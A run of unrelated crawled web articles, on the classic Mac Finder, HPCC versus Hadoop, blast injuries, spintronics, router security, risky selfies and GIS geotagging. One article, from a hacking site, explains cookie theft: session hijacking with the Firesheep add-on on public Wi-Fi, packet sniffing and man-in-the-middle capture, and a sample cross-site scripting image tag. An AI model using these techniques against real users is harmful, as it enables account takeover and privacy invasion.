Back in 1984, explanations of the original Mac interface to users who had never seen a GUI before inevitably included an explanation of icons that went something like this: "This icon represents your file on disk." But to the surprise of many, users very quickly discarded any semblance of indirection. This icon is my file. My file is this icon. One is not a "representation of" or an "interface to" the other. Such relationships were foreign to most people, and constituted unnecessary mental baggage when there was a much more simple and direct connection to what they knew of reality.
"Under the covers", of course, each file on disk was actually two "files" in the Mac file system's volume structures (a data "file" and a resource "file"), plus assorted pieces of metadata--including the icon itself!--stored in other locations entirely. But to the user, these separate pieces appeared as a single, indivisible item that was inextricably bound to the mental conception of "my file." The illusion was so well executed and so relentlessly consistent that users trusted it implicitly. "This icon is my file."
This same coherency also extended to Finder windows, to the degree that the a Mac user might not have understood what you meant by "Finder window" back in the days before Mac OS X. "Oh, you mean this folder." There was no such thing as a "Finder window" that "displayed the contents of a folder." Double-clicking a folder opened it. The resulting window was the folder. When scrolling, moving, or resizing that window, there was no doubt about which folder was being affected. And the stability of the interface was such that there was no doubt about what that folder would look like the next time it was opened.
The illusion was so powerful and so like the familiar physical world that the Finder itself disappeared as a separate entity. It has been said that "the interface is the computer", meaning that the average user makes no distinction between the way he interacts with the computer and the reality of the computer's internal operation. If the interface is hard to use, the computer is hard to use, and so on. The interface is the computer.
In the days of classic Mac OS, the Finder was the interface--and, by extension, was the computer. When people raved about the Mac's "ease of use" (especially back in the days when the Mac was home to the only mass-market personal computer GUI) what they were really raving about was the Finder. Applications may or may not have had pleasing, usable interfaces, but they were clearly "not the computer." Applications ran on the computer. You launched applications, and then quit them. The Finder was what you saw when all the applications were closed. There was no closing the Finder. To close the Finder meant to turn off the computer. The Finder was the computer.
And, no, it wasn't the single-tasking nature of the early Mac operating system that caused this feeling, for it continued long after the introduction of MultiFinder and, later, System 7. It was the meticulously constructed, relentlessly maintained illusion that files and folders were real, physical things existing inside the computer that you could manipulate in familiar, direct, predictable ways.
This illusion worked despite the fact that objects in the Finder could do things that real objects cannot. Real objects cannot disappear and reappear instantly, for example. But such behaviors in the Finder were examples of what computers had always done: make things faster. Although clicking the close box on a window made it disappear instantly, it was merely shorthand for a well understood spatial act (putting an item away), and had accompanying "visual shorthand" in the form of "zoomrects." The rules were the same; the action was just hastened. There was no question about "where the folder went." It was where you found it, of course. In a sensible world, how could it be otherwise?
The Spatial Finder is spatial where it counts. It's spatial where a failure to do so would lead to confusion or decrease efficiency. For example, if there was a one-to-many relationship between folders and windows, the connection between the act of window manipulation and the state of the folders themselves would be lost. This can be demonstrated quite easily in the Mac OS X Finder. Simply show the contents of the same folder in two different windows, move one window to one location on the screen and the other window to another location, and finally close both windows. When you open that folder again, where will the window be?
It's dangerously easy to defeat spatial orientation. Even the smallest disconnection shatters the illusion, turning what was once an utterly convincing and understandable world of files and folders into an arbitrary heap of windows, full of icons and widgets, signifying nothing.
When the spatial state of objects (size, color, position, etc.) cannot be relied upon as a means to identify and manipulate them, it ceases to be a useful method of interaction.
This is exactly what we don't want in an interface. Interfaces that do not play to the strengths of human perception and motor coordination are just plain "leaving money on the table", as the saying goes. They are necessarily less efficient than they could be. | <urn:uuid:1ccb627b-5d94-4d70-b893-445b0600b0a7> | CC-MAIN-2017-09 | https://arstechnica.com/apple/2003/04/finder/3/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00292-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.966416 | 1,700 | 2.546875 | 3 |
When you hear the expression "big data," the next word you will often hear is "Hadoop." That's because the underlying technology that has made massive amounts of data accessible is based on the open source Apache Hadoop project.
From the outside looking in, you would rightly assume then that Hadoop is big data and vice versa; that without one the other cannot be. But there is a Hadoop competitor that in many ways is more mature and enterprise-ready: High Performance Computing Cluster.
Like Hadoop, HPCC is open-sourced under the Apache 2.0 license and is free to use. Both likewise leverage commodity hardware and local storage interconnected through IP networks, allowing for parallel data processing and/or querying across the architectures. This is where most of the similarities end, says Flavio Villanustre, vice president of information security and the lead for the HPCC Systems initiative within LexisNexis.
HPCC Older, Wiser Than Hadoop?
HPCC has been in production use for more than 12 years, though the HPCC open source version has been available for only a little more than a year. Hadoop, on the other hand, was originally part of the Nutch project that Google put together to parse and analyze log files and wasn't even its own Apache project until 2006. Since that time, though, it has become the de facto standard for big data projects, far outpacing HPCC's 60 or so enterprise users. Hadoop is also supported by an open source community in the millions and an entire ecosystem of start-ups springing up to take advantage of this leadership position.
That said, HPCC is a more mature enterprise-ready package that uses a higher-level programming language called enterprise control language ( ECL) based on C++, as opposed to Hadoop's Java. This, says Villanustre, gives HPCC advantages in terms of ease of use as well as backup and recovery of production. Speed is enhanced in HPCC because C++ runs natively on top of the operating system, while Java requires a Java virtual machine (JVM) to execute.
HPCC also possesses more mission-critical functionality, says Boris Evelson, vice president and principal analyst for Application Development and Delivery at Forrester Research. Because it's been in use for much longer, HPCC has layers-security, recovery, audit and compliance, for example-that Hadoop lacks. Lose data during a search and it's not gone forever, Evelson says. It can be recovered like a traditional data warehouse such as Teradata.
How-to: Secure Big Data in Hadoop
Rags Srinivasan, senior manager for big data products at Symantec, wrote about this shortcoming in a May 2012 blog post on issues with enterprise Hadoop: "No reliable backup solution for Hadoop cluster exists. Hadoops way of storing three copies of data is not the same as backup. It does not provide archiving or point in time recovery."
Although Hadoop is less mature in these areas, it's not intended to be used in a production environment, so these distinctions may not be that important at the moment, says Jeff Kelly, big data analyst at Wikibon. What it's being used for is analyzing massive amounts of data to find correlations between heretofore hard-to-connect data points. Once these points are uncovered, the data is often moved to a more traditional business intelligence solution and data warehouse for further analysis.
"Currently, the most common use case for Hadoop is as a large-scale staging area," Kelly says. "Essentially [it is] a platform for adding structure to large volumes of multi-unstructured data so that it can then be analyzed by relational-style database technology."
ECL: A High-Level Query Language With a Drag-and-Drop Interface
Another key benefit of ECL, Villanustre says, is that it's very much like high-level query languages such as SQL. If you're a Microsoft Excel maven, then, you should have no trouble picking up ECL.
Developing queries is further simplified by the work HPCC has done with analytics provider Pentaho and its open source Kettle project, which lets users create ECL queries in a drag and drop interface. This isn't possible with Hadoop's Pig or Hive query languages yet.
HPCC is also designed to answer real-world questions. Hadoop requires users to put together separate queries for each variable they seek; HPCC does not.
"ECL is a little bit like SQL...in that it is declarative, so you tell the computer what you want rather than how to do it," Villanustre says. Pig and Hive, on the other hand, are quite primitive. "They are hard to program, they are hard to maintain and they are hard to extend and reuse the code-which are the key elements for any computer language to be successful."
Hadoop's Advantages? It's Scalable, Flexible, Inexpensive
Charles Zedlewski, vice president of products at Cloudera, disagrees with this perspective. Cloudera, after all, is among the best-known and most successful Hadoop start-ups, providing turnkey Hadoop implementations to companies as diverse as eBay, Chevron and Nokia.
"In fact, today Hadoop probably has the ability to cater to a wider range of end users than the data management systems that have come before, and that has always been the strength of Hadoop," Zedlewski says. "The three things that Hadoop does really well is it's very scalable, it's very flexible and very inexpensive."
As well as being flexible and robust, it's this last point that has so many people interested in Hadoop. However, while Hadoop runs on commodity hardware, you either have to hire someone to put everything together or find a third-party provider such as Cloudera to do it for you. With HPCC, much of the functionality you need is available out of the box-and it runs on commodity boxes as well.
In the final analysis, on the one hand, if you're looking for a more robust solution that provides enterprise-grade functionality, then HPCC may be the way to go. On the other hand, if you are just wanting to get a feel for what big data is all about, then Hadoop may be the better alternative, since it has a massive open-source ecosystem of developers working on it daily and a host of third-party companies springing up to take advantage of the opportunity big data represents.
"The macro trend that is driving all this is the explosion of data," Zedlewski says. "Data is growing faster than Moore's Law, which is requiring this different architecture and different way of working with data. And the reason it's growing faster than Moore's Law is because more and more things are getting hooked up to computers, whether it be your house, your TV, your cell phone, the flight you took. When that happens, they all wind up generating data at prodigious rates."
Allen Bernard is a Columbus, Ohio-based writer who covers IT management and the integration of technology into the enterprise. You can reach Bernard via email or follow him on Twitter @allen_bernard1. Follow everything from CIO.com on Twitter @CIOonline, on Facebook, and on Google +.
Read more about big data in CIO's Big Data Drilldown.
This story, "HPCC Takes on Hadoop's Big Data Dominance" was originally published by CIO. | <urn:uuid:0b10d0a1-bcc0-4312-b07a-51071abb98fa> | CC-MAIN-2017-09 | http://www.itworld.com/article/2711829/big-data/hpcc-takes-on-hadoop-s-big-data-dominance.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171834.68/warc/CC-MAIN-20170219104611-00344-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.9559 | 1,604 | 2.71875 | 3 |
Troops exposed to blasts in Afghanistan and Iraq “have an increased risk of developing adverse health outcomes over the long term,” including post-traumatic stress disorder, traumatic brain injury, persistent headaches and growth hormone deficiency, according to a report released Thursday.
"Acute physical and psychological health outcomes in people who survive blast explosions can be devastating, but the long-term consequences are less clear, particularly for individuals who show no external signs of injury from exposure to blast waves or may not even be aware that they were exposed,” said Stephen Hauser, chairman of department of neurology of the University of California, San Francisco, and chair of the Institute of Medicine committee that wrote the blast report.
Some 2.2 million troops served in Iraq and Afghanistan over the past 13 years, with 21,556 physically wounded by blasts from improvised explosive devices and 244,217 diagnosed with traumatic brain injury, IOM reported.
VA commissioned the IOM report because it was concerned about blast injuries, considered the signature wound of the long wars in Afghanistan and Iraq. The 192-page report on blast explosure's long-term repercussions is the latest in a series of IOM studies on the health effects of war since 1998, after the first Iraq War.
Blast exposure may result in long-term hearing damage and muscle or bone impairment such as osteoarthritis, IOM found. “However, the data on these outcomes were not strong enough to draw a direct cause-and-effect relationship,” the institute said. There was only tentative evidence to link blast exposure to long-term effects on cardiovascular and pulmonary function, substance-abuse disorders and chronic pain in the absence of a severe, immediate injury, the report said.
While there is substantial overlap between symptoms of mild TBI and PTSD, limited evidence suggests that most of the shared symptoms could be a result of PTSD and not a direct result of TBI alone, the IOM report said.
The report recommended Defense develop and deploy data collection technologies that quantitatively measure components of blast and characteristics of the exposure environment in real-time and also link the with self-reported exposure histories and demographic, medical and operational information.
It also suggested VA create a database that links Defense records for troops with blast injuries to VA health records to “facilitate long term health care needs after blast injury.” VA should create a registry of blast exposed-veterans to serve as a foundation for long term studies.
VA also needs to develop clinical practice guidelines for blast related injuries other than PTSD and TBI and needs to encourage its clinicians to ask veterans about blast exposure, IOM recommended. | <urn:uuid:68626bef-4fe7-457f-9c02-21bbda92c1c3> | CC-MAIN-2017-09 | http://www.nextgov.com/health/2014/02/troops-exposed-blasts-more-likely-get-ptsd-tbi-other-long-term-ailments/78806/?oref=ng-dropdown | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171834.68/warc/CC-MAIN-20170219104611-00344-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.945162 | 541 | 2.640625 | 3 |
Cookies still remain one of the largest areas of computing that the average user just doesn’t understand, and there are a myriad of different ways that a hacker can take advantage of cookies to steal a user’s personal information. Cookie stealing, which is synonymous with session hijacking, allows an attacker to log into a website that is protected with a user’s username and password by stealing session data in real-time. But before we delve into the different ways of stealing cookies, we first need to understand what a session is and how cookies work.
What is a Session?
“Session” is a term in computing – more specifically, networking – that gets thrown around a lot, but it can seem like jargon to the aspiring hacker. Most concepts in computer networking are in some way related to the OSI model, which is comprised of seven different layers that map different stages and processes of data exchange between two remote computing systems. More importantly, the fifth layer is called the Session layer, and this is where the term “session” gets it’s name.
Within the Session layer of the OSI model, you’ll find common protocols such as SOCKS (a common type of proxy server connection), PPTP (Point to Point Tunneling Protocol), RTP (Real-time Transport Protocol), and others that aren’t as well known. However, when someone talks about session hijacking, they’re most often referring to a session between a client computer and a web server. In this context, “session” basically means a semi-constant exchange of information between two hosts. In contrast, consider constant exchanges through other protocols such as VPN tunnels, whereby the connection is permanent (barring technical difficulties, of course).
In a session, two computers exchange information and authentication credentials to lay the groundwork for future communications. Take Facebook, for example. After you have logged into the Facebook service, you can browse through your feed, chat with friends, and play games until you intentionally choose to log out. If a session hadn’t been built between your computer and the Facebook servers, you would need to continually login again and again every time you wanted a new piece of data. Fortunately, you don’t have to, because all of your connection information is stored within a cookie.
What is a Cookie?
Cookies are small repositories of data that are stored within your web browser by a web server. They are rife with security concerns, and some of them can even track your online activity. Whenever you visit a web site, the cookie stored in your browser serves as a type of ID card. Each additional time you login or request resources from the same web server, the cookie saved in your browser sends its stored data to the web server. This allows web site administrators, and even Internet marketers, to see which of their pages are getting the most hits, how long users stay on each page, which links they click on, and a wealth of other information.
Furthermore, cookies are used to make a website more personal. Many sites offer preference options to let you customize the look, feel, and experience of any given web service. Once you revisit the site or resource, you’ll find that all your preferences were preserved. Though cookies make browsing the web a lot more convenient, they do have a lot of security drawbacks, as we’ll discuss next.
Types of Cookies and Security Problems
In theory, the only other online entity that can read cookies stored in your browser is the website that stored it there originally. However, it’s surprisingly easy for scripts to mine data from cookies, and there are some exceptionally dangerous types of cookies that are rife with security threats. Mainly, the types of cookies that are the most fearsome are named Flash cookies, zombie cookies, and super cookies.
Even though your browser has ways to manage cookies, some are nearly impossible to delete. The problem is that special types of cookies aren’t stored within your browser, so even if you opt for a different web browser (Firefox, Chrome, etc.), the cookie will still be active. And many of these types of cookies are much larger than the average 4KB HTTP cookies – some of them ranging to 100KB or even 1MB. If you attempt to delete the cookie but notice that it keeps coming back every time you restart your browser, you’ve discovered a zombie cookie and may need special security software to remove it.
Viewing Your Cookies and Managing Them
You might now be wondering just how many cookies you have stored in your browser, and what you can do to pro-actively manage them and avoid the disaster of having an attacker hijack your session. Just about every browser has useful extensions that allow users to manage, backup, delete, secure, and view their cookies. All it takes is a simple search through your browser’s add-ons menu, though for Firefox users, I highly recommend the View Cookies add-on.
Though you can navigate through the file system and see the cookies individually (which stored in different places by different browsers), I think the add-ons are the best way to go. Furthermore, just about every browser has code that allows users to completely disable cookies or set limitations, such as disallowing any cookies that are greater than X number of kilobytes or megabytes in size. Lastly, many browsers even have a setting that specifically disables flash cookies.
The Easiest Way to Steal Cookies
There are a number of ways that someone can steal another user’s cookies. From cross site scripting attacks to viruses embedded in seemingly harmless software, modern hackers have a lot of tools in their tool belt to hijack an unsuspecting user’s session. Many of these advanced attacks require a lot of background knowledge and expertise in networking protocols, software development, and web technologies to carry out the attack.
Unfortunately for average users, there is one place way that is easier to steal cookies than any other attack method, and that’s by using simple tools over a local LAN. But getting access to a local LAN isn’t as challenging as it may seem. You can view any of our other posts on just how easy it is to crack wireless encryption protocols, but try to imagine where the easiest place is for hackers to connect with other users over a local LAN. Can you guess where it is?
That’s right, on public Wi-Fi networks such as those found at airports and your local Internet café – heck, even a Starbucks. You don’t even need any fancy command line tools or advanced packet sniffing knowledge to steal cookies. Nope, all you need is a Firefox extension called Firesheep. Though it isn’t currently supported on Linux, it is available on Mac OS X and Windows (XP and later versions, dependent on the Winpcap package).
Firesheep is a simple to use Firefox extension that leverages underlying packet sniffing technology to detect and copy cookies that are sent in an unencrypted format. If the cookie is sent across the network in an encrypted format, there’s not much this tool can do, however. But Firesheep makes it ludicrously simple to hijack a user’s session. As the extension sniffs out cookies, it populates a list of them on the sidebar of your browser in real-time. Once an unencrypted cookie has been discovered, the user (it’s so simple I doubt it’s fair to use the term hacker) simply needs to double-click on the cookie and they’ll automatically hijack the session and log in as the unsuspecting user.
Given that Mozilla is a legitimate and trustworthy organization, it’s a little odd that they wouldn’t blacklist the extension. However, Mozilla had stated that they only use their blacklist to mark code and add-ons that contain spyware and other such security threats. Since this tool doesn’t harm the user’s browser, it seems that it’s still available. But even if they did disable, attackers would still be able to use the tool since Firefox contains a feature that effectively disables the blacklist.
Packet Sniffer’s and Man-in-the-Middle Attacks
Firesheep is essentially a packet sniffing add-on that is ridiculously user-friendly. However, advanced users can take advantage of other packets sniffers, such as Wireshark, to steal cookies. However, this method is a lot harder an takes some preexisting knowledge of how to work in Firefox. We won’t detail the process of starting a Wireshark packet capture here, but we do want you to understand how they work.
Man-in-the-Middle attacks and DNS based attacks are very common, and they both work to redirect a user’s traffic to a computer system that the hacker controls – such as their personal computer, a server, or a networking device (router, firewall, proxy server, etc.). Once the hacker has hoodwinked the end user’s computer and/or the default gateway into sending their data to the hacker’s networking interface, the attacker can see everything that isn’t encrypted. Naturally, this includes cookies, so all a hacker would have to do is run a capture, analyze collected traffic, and pluck the cookie data out of their results before the user disconnects or logs out.
Cross-Site Scripting (XSS)
Last but not least, cross-site scripting is another popular way to steal cookies from a user. If you remember, most often only the website that stored a cookie can access it, but this isn’t always the case. Cross-site scripting works by embedding PHP (among other types) of scripts into web pages, web pages that may or may not be owned by the hacker (though often they are not).
Though security controls are always increasing, there are still a vast amount of websites vulnerable to XSS attacks. It can even be a simple website like a forum. For example, consider a forum that allows image tags. They code post a link in the image tag with code such as the following: <img src=MyBadScript.html/>
Other times, they may simply link to a web resource that contains their script. Once the script executes in the users web browser, the attacker’s code will execute and send copies of any active cookies to another location, such as their web browser or another resource.
Remember that the idea here is to learn how to protect yourself, and others, from becoming the victim of a cookie stealing attack. Though it would be simple to run Firesheep, I’d highly advise against doing anything illegal. Also remember to respect other user’s privacy. | <urn:uuid:b3e0b3c6-8074-4b65-be80-fe590cba9a9a> | CC-MAIN-2017-09 | https://www.hackingloops.com/tag/cookies/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171834.68/warc/CC-MAIN-20170219104611-00344-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.938352 | 2,232 | 3.265625 | 3 |
In a paper set to be published this week in the scientific journal Nature, IBM researchers are claiming a huge breakthrough in spintronics, a technology that could significantly boost capacity and lower power use of memory and storage devices.
Spintronics, short for "spin transport electronics," uses the natural spin of electrons within a magnetic field in combination with a read/write head to lay down and read back bits of data on semiconductor material.
By changing an electron's axis in an up or down orientation - all relative to the space in which it exists -- physicists are able to have it represent bits of data. For example, an electron on an upward axis is a one; and an electron on a downward axis is a zero.
Spintronics has long faced an intrinsic problem because electrons have only held an "up or down" orientation for 100 picoseconds. A picosecond is one trillionth of a second (one thousandth of a nanosecond). One hundred picoseconds is not enough time for a compute cycle, so transistors cannot complete a compute function and data storage is not persistent.
In the study published in Nature, IBM Research and the Solid State Physics Laboratory at ETH Zurich announced they had found a way to synchronize electrons, which could extend their spin lifetime by 30 times to 1.1 nanoseconds, the time it takes for a 1 GHz processor to cycle.
The IBM scientists used ultra short laser pulses to monitor the evolution of thousands of electron spins that were created simultaneously in a very small spot, said Gian Salis, co-author of the Nature paper and a scientist in the Physics of Nanoscale Systems research group at IBM Research.
Usually, such spins find electrons randomly rotating and quickly losing their orientation. In this study, IBM and ETH researchers found, for the first time, how to arrange the spins neatly into a regular stripe-like pattern -- the so-called persistent spin helix.
The concept of locking the spin rotation was originally proposed as a theory back in 2003, Salis said. Since then, some experiments found indications of such locking, but the process had never been directly observed until now, he added.
"These rotations of direction of spin were completely uncorrelated," Salis said. "Now we can synchronize this rotation, so they don't lose their spin but also rotate like a dance, all in one direction."
"We've shown we completely understand what's going on there, and we've proven that the theory works," he added.
The IBM researchers have been using gallium arsenide, a material commonly used today in electronics, diodes and solar cells, as their primary semiconductor material.
Today's computing technology encodes and processes data by the electrical charge of electrons. However, researchers say the technique becomes limited as semiconductor dimensions shrink to the point where the flow of electrons can no longer be controlled.
For example, NAND flash products already use circuitry that is less than 20 nanometers in width, which is approaching atomic size. Spintronics could surmount this memory impasse by harnessing the spin of electrons instead of their charge.
The new understanding of spintronics can not only give scientists unprecedented control over the magnetic movements inside devices, but also opens new possibilities for creating more energy efficient electronic devices.
IBM is not alone in its pursuit of spintronics technology research.
Three years ago, physicists from the Institute of Materials Physics and Chemistry in Strasbourg, France, built new laser technology on the foundation of spintronics and won the 2007 Nobel physics prize for the effort.
The French physicists discovered a way to use lasers to accelerate storage I/O on hard discs by up to 100,000 times current read/write methods.
A problem with spintronics had been the slow speed of magnetic sensors that are used to detect bits of data. But according to the 2007 French study, published in the scientific journal Nature Physics, the team used a "Femtosecond" laser, which produces super-fast laser bursts to alter electron spin, speeding up the read/write process.
IBM's researchers said their breakthrough opens the door for efforts to create transistors and non-volatile storage that would use considerably less power than today's NAND flash technology.
However, one rather large sticking point is that researchers haven't been able to produce their results at room temperature, an important requirement for producing a viable processor or memory device. Currently, experiments take place at very low temperatures of 40 degrees Kelvin, or -233 Celsius, -387 Fahrenheit.
"There's no device for this yet, but it's a breakthrough in that we now know how to increase the electron's spin lifetime in channel," Sails said. "Next, one thing we'd really like to do is increase that [spin lifetime] by a factor of 30."
Lucas Mearian covers storage, disaster recovery and business continuity, financial services infrastructure and health care IT for Computerworld. Follow Lucas on Twitter at @lucasmearian, or subscribe to Lucas's RSS feed . His e-mail address is firstname.lastname@example.org.
Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center.
This story, "IBM claims spintronics memory breakthrough" was originally published by Computerworld. | <urn:uuid:577be04a-14ad-4b00-95b8-4a3a1296a328> | CC-MAIN-2017-09 | http://www.itworld.com/article/2725460/storage/ibm-claims-spintronics-memory-breakthrough.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172156.69/warc/CC-MAIN-20170219104612-00520-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.940657 | 1,094 | 3.578125 | 4 |
Home routers and other consumer embedded devices are plagued by basic vulnerabilities and can't be easily secured by non-technical users, which means they'll likely continue to be targeted in what has already become an increasing trend of mass attacks.
Computer OSes have advanced considerably from a security standpoint over the last decade, with their creators strengthening code and adding a variety of protections. However, routers, modems, wireless access points and other "plug-and-forget" devices have lagged behind as their makers lacked strong incentives to secure them. As a result, those devices can now pose a significant threat to the online security of users, contrary to the long-held belief that connecting a computer through a home router is better than exposing it directly to the Internet.
Routers and other embedded devices have simply not been on attackers' radar until now, at least not on a significantly large scale, but that's starting to change and if the attacks observed this year are any indication, it might be happening at a faster pace than manufacturers can react.
Because routers can affect all other local devices that access the Internet through them, they are a rich target, said Trey Ford, global security strategist at security firm Rapid7, via email. "Users expect a website to be authentic, and a compromised router (DSL router, gateway, wireless access point, cable modem -- take your pick) allows a malicious party to undermine that trust. The trend of connecting more devices to the Internet only means there is more for attackers to play with."
For instance, in early February incident responders from the Polish Computer Emergency Response Team warned that thousands of home routers in the country had their DNS settings hijacked by attackers in an attempt to intercept online banking connections. Later that month security researchers from the SANS Institute's Internet Storm Center (ISC) discovered a worm that was infecting Linksys E-Series routers and then in March Internet security research organization Team Cymru reported that a global attack campaign compromised 300,000 home and small-office wireless routers.
Other significant incidents this year include thousands of Asus routers exposing to the Internet the content of hard drives attached to them, Hikvision DVRs being infected with Bitcoin mining malware due to a default root password and exposed telnet service, and millions of home routers being exposed to DNS-based DDoS amplification abuse.
This year antivirus companies have also found malware binaries compiled for architectures commonly used on embedded devices like ARM, PPC, MIPS and MIPSEL or botnets that attempt to access routers using easy-to-guess credentials.
Carsten Eiram, the chief research officer at vulnerability intelligence firm Risk Based Security, believes that attackers have begun shifting focus from exploiting vulnerabilities in popular client applications to targeting routers because many software developers have stepped up their game by improving their code and adding security mechanisms to their programs.
"Embedded devices like home routers are an obvious choice [as new targets for attackers]," Eiram said via email. "They're used by 'everyone,' the code maturity from a security perspective is usually terrible, and they have no real security mechanisms in place, making exploitation easier."
Device manufacturers are far behind when it comes to secure programming, he said. "The vulnerabilities being found are often very basic issues straight out of the 1990's like buffer overflows and OS command injection. We've even seen reports of blatantly obvious back-door like 'features'."
Many vendors are also unprepared to deal with security issues and don't seem to have any real security program in place, either for the development process or for handling vulnerabilities reported to them, Eiram said.
The standard networking equipment provided by ISPs to their customers can increase the threat of large-scale attacks because any critical vulnerability discovered in such devices can result in millions of potential targets with uniform configurations that are easy to attack.
These vulnerabilities are not uncommon. On Tuesday a researcher released details about vulnerabilities found in the standard ADSL/Fiber Box devices supplied by French ISP SFR to its customers and in January, a different researcher found critical vulnerabilities in the standard EE BrightBox router supplied by U.K. ISP EE. SFR has a broadband customer base of 5.2 million, according to its website, and EE, a joint venture between Deutsche Telekom and Orange, claims that its fiber broadband service reaches 15 million U.K. households.
Ilia Kolochenko, the CEO of Geneva-based security firm High-Tech Bridge, believes it's not only manufacturers that are to blame for the poor security of routers. Many users are often the bigger problem because they don't even change the default admin password on their devices, leaving the door wide open for attackers, he said via email.
However, Kolochenko agreed that updating and configuring routers can prove difficult for non-technical people and thinks that ISPs should educate their customers about the importance of configuring their routers in a secure way, just like they advise them on securing their PCs.
"Right now, it would be good if people at least realized that their home routers should also be secured, as they are not just 'devices to plug-in and forget about'," he said. "Then they can hire IT consultants from their ISPs -- many offer telephone consulting and guidance for free -- or ask IT-savvy friends to check if their router is secure."
"The majority of installed embedded devices -- not just routers, but TVs, storage devices and anything else you place in that 'Internet of Things' bucket -- do not automatically update," Ford said. "This means they do not automatically install important security fixes that address issues like these."
Eiram believes that the absence of automatic updates is exactly the reason why embedded devices should have better code maturity and secure configurations from the beginning.
"To most home users, a router is that magical box in the corner, allowing them to go on the Internet," Eiram said. "Many are still struggling to update software on their computers that don't have auto-update features. Asking those users to log in and then configure or update their routers is not realistic."
For those users who do feel knowledgeable enough to configure their own routers, Eiram advises disabling access to the administration interface from the Internet, as that is usually the most commonly vulnerable feature.
"Ensuring other services are not remotely accessible is also a good idea, since we do see vulnerability reports in those as well," he said. "The problem here is that it is sometimes not even clear to users that a service is active and listening remotely. Finally, checking for updates regularly is important and usually possible from within the the web-based management interface." | <urn:uuid:6082a40e-05c3-47af-b61e-b3a5ea05bbce> | CC-MAIN-2017-09 | http://www.cio.com/article/2377383/security0/users-face-serious-threat-as-hackers-take-aim-at-routers--embedded-devices.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170992.17/warc/CC-MAIN-20170219104610-00164-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.958945 | 1,354 | 2.546875 | 3 |
Researchers are working on an app that could save people from being killed while taking dangerous selfies.
Carnegie Mellon University announced that researchers there are working with colleagues at Indraprastha Institute of Information Technology in Delhi, India to take on the issue of deadly selfies.
People around the globe have been putting themselves in reckless situations - on railroad tracks, on cliff edges -- to grab a memorable selfie. Researchers found that individuals died falling from high places, while the most group deaths happened around water, with some dying in capsized boats.
"In India, a number of deaths occurred when friends or lovers posed on railroad tracks, which is widely regarded as a symbol of long-term commitment in that culture," Carnegie Mellon reported. "Gun-related deaths in selfies occurred only in the U.S. and Russia. Road- and vehicle-related selfies and animal-related selfies also were associated with deaths."
Men accounted for three out of every four deaths, the report noted.
There's also concern that selfie deaths will continue to rise as taking dangerous selfies grows in popularity, with people using hashtags like #dangerousselfie and #extremeselfie.
Researchers culled public records to compile a list of 127 deaths associated with people around the world taking selfies between March 2014 and September 2016. Using that information, along with news reports on selfie-related deaths, researchers were able to design a system that uses location, image and text to classify whether a selfie was taken during a dangerous situation.
With machine learning, the researchers then taught a computer to look for dangerous selfies on social media sites. The computer, using image recognition, looked for dangerous locations like extreme heights, locations near water or near railways and busy roads. Analysis of the image itself, as well as of any text it contained, helped train the computer to classify a selfie as dangerous or not.
According to Carnegie Mellon, the system was able to tell the difference between a dangerous selfie and one that is not risky 73% of the time.
That technology will be critical to developing an app that could be used to decrease the number of selfie deaths.
An app, which has not yet been developed, could be designed to warn a user or even disable the phone if a selfie is being taken in a dangerous situation. The problem, though, is that some people might use a warning as bragging rights that they're brave enough to put themselves in a dangerous situation.
"There can be no app for stupidity," Hemank Lamba, a Ph.D. student in Carnegie Mellon's Institute for Software Research, said in a statement.
The app also could be used to pinpoint areas where people are routinely taking dangerous selfies so they could be marked as "no selfie" zones.
Carnegie Mellon also noted that an app could be used for augmented reality games, like Pokemon Go, to keep users from putting themselves in risky situations while playing.
"When you see a problem in society," he explained, "you find ways to use technology to solve it."
This story, "Researchers work to tame deadly selfies" was originally published by Computerworld. | <urn:uuid:676e3a93-064c-4bb9-9aed-2736fe79b3f5> | CC-MAIN-2017-09 | http://www.itnews.com/article/3144451/internet/researchers-work-to-tame-deadly-selfies.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174154.34/warc/CC-MAIN-20170219104614-00392-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.97374 | 633 | 2.984375 | 3 |
Harry Potter and the evolution of GIS
With geospatial advances, everyone might soon have a Marauder’s Map. Is that good?
- By Kevin McCaney
- Sep 17, 2010
In “Harry Potter and the Prisoner of Azkaban,” J.K. Rowling introduced the Marauder’s Map, a magical piece of parchment that would let the user see the location, around the clock and in real time, of everyone on the Hogwarts school grounds.
It was an ingenious notion that fit right in with Rowling’s fanciful world of potions, flying brooms and hippogriffs. But in an unusual twist of fact and fantasy, it turns out that, 11 years after the novel appeared, something like a Marauder’s Map isn’t that far from reality. Pretty soon, everybody might have one.
Advances in geographic information systems have been barreling forward of late. Combined with Global Positioning System data and sophisticated mapping software, geospatial applications are being applied to everything from emergency response to urban planning, and are moving into 3-D and even 4-D apps.
The future of GIS: Crowds, cloud…and 4G
GPS devices could put American soldiers at risk
And one of the tools being developed for the not-too-distant future is geoSMS, which would allow the geotagging of Short Message Service messages, such as those used on Twitter. If you’re tweeting on the go, others would be able to follow your location. Get a lot of people involved, add a mapping app, and, theoretically, everyone could have a live map of everyone else’s location. Like magic.
An app like that would have obvious real-world advantages — in emergencies, for example, or in law enforcement and other field work. People in need of rescue could be found more easily. People on a mission could be tracked.
But as with any innovation, this has its good side and dark side. People have recently raised red flags about cameras and smart phones with GPS receivers, which embed geographic coordinates into pictures taken with the devices. If posted on the Web, anyone using one of several free apps can easily derive the location of the photo. Security experts also have warned the military that hacked smart phones could reveal troop locations to the enemy. Geotags on text messages likewise could be a double-edged sword.
Of course, possible vulnerabilites won't stop their use. For one thing, the potential benefits are too great. For another, they’re bound to be popular — both on the job and on the street.
But there are ways to prevent their misuse. With cameras and smart phones, users can turn off geotagging features, although they have to know how.
